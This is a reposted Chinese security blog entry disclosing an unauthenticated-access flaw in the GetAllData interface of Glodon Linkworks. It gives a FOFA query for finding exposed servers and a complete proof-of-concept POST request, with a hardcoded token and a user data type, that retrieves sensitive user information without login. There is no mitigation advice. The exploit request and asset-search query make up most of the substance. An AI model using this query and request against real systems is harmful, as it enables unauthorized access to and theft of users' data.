广联达Linkworks-GetAllData接口存在未授权访问漏洞

admin 2024年2月24日22:07:27评论79 views字数 615阅读2分3秒阅读模式

 

漏洞描述

由于广联达 GetAllData接口处设置不当,未经身份认证的攻击者通过构造特殊的数据包,可以访问系统敏感信息。

资产测绘

FOFA:body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

漏洞POC复现

POST /WebService/Lk6SyncService/MrMMSSvc/DataSvc.asmx/GetAllData HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; SM-P585Y) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
Content-Length: 32
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded

Token=!@#$asdf$#@!&DataType=user

 

 

 


原文始发于微信公众号(漏洞文库):【漏洞复现】广联达Linkworks-GetAllData接口存在未授权访问漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月24日22:07:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   广联达Linkworks-GetAllData接口存在未授权访问漏洞https://cn-sec.com/archives/2522594.html

发表评论

匿名网友 填写信息